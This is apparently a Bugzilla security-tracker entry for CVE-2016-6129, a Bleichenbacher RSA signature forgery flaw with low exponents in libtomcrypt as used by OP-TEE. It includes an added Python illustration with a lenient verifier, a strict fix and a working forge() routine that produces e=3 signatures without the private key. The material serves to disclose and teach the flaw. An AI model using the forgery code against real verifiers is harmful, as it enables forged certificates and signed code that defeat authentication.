Bug 1370955 (CVE-2016-6129) - CVE-2016-6129 libtomcrypt: possible OP-TEE Bleichenbacher attack
Summary: CVE-2016-6129 libtomcrypt: possible OP-TEE Bleichenbacher attack
Keywords:
Status: CLOSED NOTABUG
Alias: CVE-2016-6129
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20160826,repor...
Depends On: 1370956 1370957 1471002
Blocks: 1460222
 
Reported: 2016-08-28 23:50 UTC by Jeremy Choi
Modified: 2019-06-08 21:24 UTC (History)

Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed: 2019-06-08 02:57:56 UTC



Description Jeremy Choi 2016-08-28 23:50:24 UTC
It has been reported that libtomcrypt may be vulnerable to a Bleichenbacher attack due to a vulnerability in rsa_verify_hash.c

CERT has provided the details from the Intel Security Advanced Threat Research team.
 
----------------------------------------------------------------------
Bleichenbacher signature forgery attack in OP-TEE
 
    Background
 
    The implementation for RSA signature verification of PKCS 1 v1.5 in the Open Portable Trusted Execution Environment (https://github.com/OP-TEE/optee_os) appears to be vulnerable to a Bleichenbacher signature forgery attack. The vulnerability may result in RSA signature or public certificate forgery when a low public exponent (for example, e = 3) is used.
 
 
 
    Vulnerability
 
    The function rsa_verify_hash_ex (https://github.com/OPTEE/optee_os/blob/master/core/lib/libtomcrypt/src/pk/rsa/rsa_verify_hash.c) does not check the number of remaining bytes in the decrypted message after ASN.1 encoded data.
 
    The function decodes the ASN.1 message and checks that it has the correct structure and values (OID and hash). This permits additional data after the ASN.1 message that can be used to forge a PKCS1 v1.5 signature for keys with a low public exponent. The original variant of the attack is described here: https://www.ietf.org/mail-archive/web/openpgp/current/msg00999.html

----------------------------------------------------------------------
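Added illustration of the flaw quoted above; this is not code from libtomcrypt, OP-TEE, CERT or the reporter. A toy PKCS#1 v1.5 verifier (`verify_lenient`) mirrors the reported behaviour: it checks the 00 01 FF..FF 00 padding and the DigestInfo, then stops, never examining the bytes that follow. Next to it is the strict form (`verify_strict`), which rebuilds the whole expected block and compares all of it, and `forge`, which produces an e = 3 signature from nothing but the modulus length. The 2048-bit key size, the SHA-256 DigestInfo, the toy key generation and the sample message are all assumptions made for the example. Python is used because the forgery needs an arbitrary-precision cube root.

```python
import hashlib
import hmac
import random

# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")
E = 3            # low public exponent, the precondition for the attack
KEY_BITS = 2048  # assumed key size; the skipped region must exceed ~2/3 of it


def _is_probable_prime(n, rng, rounds=24):
    """Miller-Rabin; adequate for a demo key, not for production use."""
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_key(bits=KEY_BITS, seed=1):
    """Toy RSA key with e = 3; the fixed seed makes the example repeatable."""
    rng = random.Random(seed)

    def prime(b):
        while True:
            p = rng.getrandbits(b) | (1 << (b - 1)) | 1
            if p % 3 == 2 and _is_probable_prime(p, rng):  # gcd(3, p - 1) == 1
                return p

    p, q = prime(bits // 2), prime(bits // 2)
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def _modulus_len(n):
    return (n.bit_length() + 7) // 8


def _encode(msg, k):
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 DigestInfo, exactly k bytes."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def sign(msg, n, d):
    k = _modulus_len(n)
    return pow(int.from_bytes(_encode(msg, k), "big"), d, n).to_bytes(k, "big")


def verify_lenient(msg, sig, n):
    """Mirrors the reported flaw: validates the padding and the DigestInfo,
    then returns, so whatever follows in the decrypted block is ignored."""
    k = _modulus_len(n)
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < k and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= k or em[i] != 0x00:
        return False
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    return em[i + 1:i + 1 + len(t)] == t   # BUG: em[i + 1 + len(t):] unchecked


def verify_strict(msg, sig, n):
    """Fix: rebuild the entire expected block and compare all k bytes."""
    k = _modulus_len(n)
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), E, n).to_bytes(k, "big")
    return hmac.compare_digest(em, _encode(msg, k))


def _icbrt(x):
    """Floor of the integer cube root (Newton iteration from above)."""
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + 2) // 3)
    while True:
        nr = (2 * r + x // (r * r)) // 3
        if nr >= r:
            return r
        r = nr


def forge(msg, k):
    """Bleichenbacher e = 3 forgery: needs only the modulus length, not the key.
    Target block: 00 01 FF*8 00 DigestInfo followed by zero filler. The smallest
    s with s**3 >= target overshoots by less than 3*s**2, far below the filler
    width, so the cube still starts with the bytes the lenient check reads;
    the remaining bytes are garbage that it never looks at."""
    t = SHA256_DIGESTINFO_PREFIX + hashlib.sha256(msg).digest()
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + t
    target = int.from_bytes(prefix + b"\x00" * (k - len(prefix)), "big")
    s = _icbrt(target)
    if s ** 3 < target:
        s += 1
    if not (s ** 3).to_bytes(k, "big").startswith(prefix):
        raise ValueError("modulus too short for this hash; no room for garbage")
    return s.to_bytes(k, "big")


if __name__ == "__main__":
    n, d = generate_key()
    msg = b"constructed sample message: release build 42"  # constructed input
    genuine, forged = sign(msg, n, d), forge(msg, _modulus_len(n))
    for label, sig in (("genuine", genuine), ("forged", forged)):
        print(f"{label:8s} lenient={verify_lenient(msg, sig, n)} "
              f"strict={verify_strict(msg, sig, n)}")
```

Note that `forge` never touches the public key: because s**3 is smaller than any 2048-bit modulus, the modular reduction in the verifier is a no-op and the same forged signature validates under every e = 3 key of that length in the lenient verifier. The strict verifier rejects it because the filler bytes are not 0xFF and the DigestInfo is not at the end of the block; the comparison against the fully rebuilt encoding is the standard fix.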

Comment 1 Jeremy Choi 2016-08-28 23:51:15 UTC
Created libtomcrypt tracking bugs for this issue:

Affects: fedora-all [bug 1370956]
Affects: epel-all [bug 1370957]

Comment 3 Borja Tarraso 2017-07-04 14:39:22 UTC
Acknowledgments:

Name: Borja Tarraso (Red Hat)

Comment 4 Borja Tarraso 2017-07-14 09:00:00 UTC
RHEV should take the pkgs from the base OS - but double checking with PM to be sure before marking this as fixed.

